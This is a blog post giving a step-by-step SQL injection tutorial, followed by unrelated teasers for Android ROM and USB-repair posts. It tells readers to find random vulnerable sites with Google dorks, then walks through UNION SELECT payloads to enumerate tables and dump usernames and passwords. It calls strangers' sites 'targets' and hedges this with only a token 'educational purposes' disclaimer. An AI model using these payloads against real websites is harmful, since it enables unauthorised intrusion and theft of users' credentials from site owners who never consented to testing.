Skip to main content

HACKING WEBSITES USING SQL INJECTION ATTACKS ON VULNERABLE SITES !!!

Warning: This is only for EDUCATIONAL purposes
to make you aware of the vulnerabilities that may
be present in your website so that you may self
test it in your OWNED website to IMPROVE the
SECURITY ,,,,,!!! The person posting this or the this
blog is not responsible for any type malicuous
activities performed by anyone else,,,,!!!
This is what they basically teach you when you
go for certain HACKING COURSES which I have
taken pains for hours to put this to you without
even earning a penny and sharing it for FREE,,,,!!!
Atleast some comments and feedback from you
will make me Happy ^_^
So Guyzzz I have now decided to post some
serious ADVANCED LEVEL OF Hacking stuffs
which is how the "Cracker" breaks into your
Vulnerable Websites,,,,!!!
All you need to know is a bit of SQL queries,,,!!!
It doesnt matter even if you are not an expert in
So here we go,,,
What is SQL Injection?
So let me give you some idea of what I am going
to talk about,,,,There are many complex
defenitions you may get in various other sites,,,
But I put it in simple terms,,,, You type some SQL
queries or codes [or whatever you wish to call
it ;D] on the address bar[whee you type the web
address of sites to be searched] to test vulnerable
website,,,,!!! If you find it vulnerable then
BINGO,,,!!! we will use some more SQL injection
queries to crack it,,,!!!
So guyzzz who are related to computer science
stream,,, If you found learning SQL boring this is
one way to make yourself interested in ;D
And as far as others are concerned,,, please dont
worry i'will be giving you some codes which you
may use to Test the Vulnerability of the site,,,!!!
QUICK STEPS TO FIND THE VULNERABILITY OF
WEBSITES,,,!!!
Step 1:
Search for any of the following terms in Google:
inurl:product.php?id=
inurl:index.php?id=
inurl:news.php?id=
inurl:shop.php?id=
inurl:shop.php?pid=
inurl:newsroom.php?id=
Step 2: Now for example say there is a website
that you found in Google search say for example
www.rahulswebsite.com/index.php?id=7
Open the website in a new tab,,,!!!
Step 3:
To test if your selected website is vulnerable:
Add the ' (single quote symbol) after the site as
follows
www.rahulswebsite.com/index.php?id=7'
and now Hit the "Enter" Key,,,!!!
If there is any type of " MySQL error " !!!BINGO,,,!!!
Then it means your target website is vulnerable.
STEPS TO HACK INTO THE WEBSITE AFTER
FINDING THE VULNERABILITY
Step 1:
After finding the vulnerability of your target site,
use the ORDER BY command to extract the
number of columns in the database.
Ex Code:
http://www.anywebsite.com/index.php?id=7
ORDER BY 1--
Doing ORDER BY 1-- should always return the
original page with NO error.
Step 2:
Then do ORDER BY 2--
If this shows the original page with NO error,
continue.
Now try ORDER BY 3--
and so on,
If this shows the original page with NO error,
continue.
Step 4:
Continue increasing the ORDER BY number until
you reach an error. For example, if doing ORDER
BY 10-- returns an error, then there is a table
which has NINE (9) columns, NOT 10. Always
subtract ONE from the number that produced the
error.
STEP 5:
Next step is to use UNION & SELECT
After getting the number of columns, let's say we
have NINE columns. Then you have to type the
following code:
Code:
http://www.anywebsite.com/index.php?id=7
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
You should see a page with a few numbers
scattered throughout it. If so, continue,
IF NOT, try the following in which we have to add
the " - "hypen or negative sign in front of the id
value of our website:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
At the end if this produces the scattered numbers,
continue, if not, STOP!!!
Choose anyother target website from the GOOGLE
search and repeat the vulnerability test,,,!!!
Step 6:
Now we use the database() command
After you see the scattered numbers, pick one to
exploit. Say the numbers on my page are TWO
and SEVEN. I will choose the number TWO. After
choosing your number, put database() in place of
it in your URL as shown below. REMEMBER, I
chose number TWO.
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,database(),3,4,5,6,7,8,9--
That should return some text in place of the
scattered TWO. WRITE THIS TEXT DOWN, and
move on.
Step 7: We use group_concat
This is where everything gets a little trickier! This
is also the part where you will be extracting data.
Yeah! Bingoo!!! :D :D *** Fist punch ***
After extracting the name of the database using
database(), type this where you typed database()
in the previous step.
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat
(table_name),3,4,5,6,7,8,9 from
information_schema.tables where
table_schema=database()--
TYPE THIS EXACTLY AS IT IS SHOWN, and press
enter.
In place of the scattered TWO, you should see a
LOT of text separated by commas. These are
called tables. The text varies by website, but you
usually want to look for things like "admin,"
"staff," or "users." Choose the one that interests
you. For this tutorial, I will choose "users." Now
type this:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat
(column_name),3,4,5,6,7,8,9 from
information_schema.columns where
table_schema=database()--
OR
if you want the columns from ONLY one table, use
this (courtesy of dR..EviL):
Code:
http://www.anywebsite.com/index.php?
id=-7UNION ALL SELECT 1,group_concat
(column_name),3,4,5,6,7,8,9 from
information_schema.columns where table_name=<
table name goes here in hex or ascii format >--
This should return even more text. These are
called columns. Again choose what interests you,
but for this tutorial, I will choose "username" and
"password."
The columns "username" and "password" contain
the data we want to extract. To extract the final
data, meaning, in this case, the usernames and
passwords of all the users, type this:
Code:
http://www.anywebsite.com/index.php?id=-7
UNION ALL SELECT 1,group_concat
(username,0x3a,password,0x3a),3,4,5,6,7,8,9 from
users--
Where it says "username,0x3a,password,0x3a" is
where you would the name of your chosen
COLUMNS, such as username and password, DO
NOT replace the 0x3a, ONLY the username and
password area. Where it says "from users--,"
replace "users" with the name of your chosen
table such as the one "users." All of this will
produce even MORE text in this format:
Code:
admin:thisismypass:,
The comma separates each set of data.

Manish chauhan

Labels:

Comments

Post a Comment

Popular posts from this blog

[ROM] XTREME OS V5 FOR MT6572

Most Features OF This Rom Rooted Deodexed Debloated init.d Enabled X launcher  battery saver tweeks added 13mp camera mod added performance boosting scripts are added dolby audio inbuilt themed x audio player Tested Games working smoothly 90-100%: Dead trigger=High Graphic Setting Asphalt8=Mid Graphics Setting NBA2k14 Cytus Real Boxing Modern Combat 4 .................... .................... .................... ............... .................... ................ Download Our App For Help Click Here Download ............... .................... ................ .................... .................... .................... How to flash this ROM 1. Go to Recovery Mode CWM/CTR (Carliv Touch Recovery) 2. Wipe>Wipe Cache> Wipe Dalvic Cache 3. Mount System and data 4. Install Zip>Choose Zip from SD card>Flash Screenshot
Post a Comment
Read more

[ROM] Flatro Style For MT6572

Most Feature of this ROM Lollipop UI Material Design    Super Ram Management  Dolby Digital Plus Deodexed Pre-rooted Fast performance Better gaming Experience  Improvement in build.prop Fixed SystemUI New Iconpack Rounded Corner Relayout View Pager Relayout Custom Drawer Ram Progress Bar in Recent Contextual Background App Circle Side Bar Tinted Statusbar Carbon Traffic Potato Clock Tested Games working smoothly 90-100% Dead trigger=High Graphic Setting Asphalt8=Mid Graphics Setting NBA2k14 Cytus Real Boxing Modern Combat 4 INSTRUCTIONS: 1.GO TO CWM/TWRP/CTR 2.WIPE SYSTEM/CACHE/DATA/DALVIK 3.SELECT "INSTALL ZIP FROM SDCARD" 4.SELECT "CHOOSE ZIP FROM SDCARD" 5.SELECT THE ROM.ZIP AND "yes" 6.REBOOT AND ENJOY .................... .................... .................... ............... .................... ............... Show Me Some of your love  Download Our Blog App For Help Click Here Download ROM ............... .................... ................ .....
Post a Comment
Read more

How to fix USB when it says this folder is empty

How to fix USB when it says this folder is empty How to fix USB when it says this folder is empty Time to fix out the pendrive issue showing empty even if the drive Is full. This type of problem occurs due to various reasons. However, we are going to share three easy methods that will help you fix Pendrive emtpy problem even when the drive is full. Go through the post to know about it. M any times Windows users face a problem that shows empty Pendrive while the drive is full. This is a very common problem which occurs due to the corruption of memory storage tables in a storage device. This type of problem occurs when users improperly eject Pendrive or external drive or when it is affected by some viruses and malware. However, this can be fixed easily without using any third party tool on your Windows PC. So have a look at complete guide discussed below to proceed. How To Fix Pen Drive Empty Problem Even The Drive Is Full The method is straight and simple, and you don’t need any technic...
Post a Comment
Read more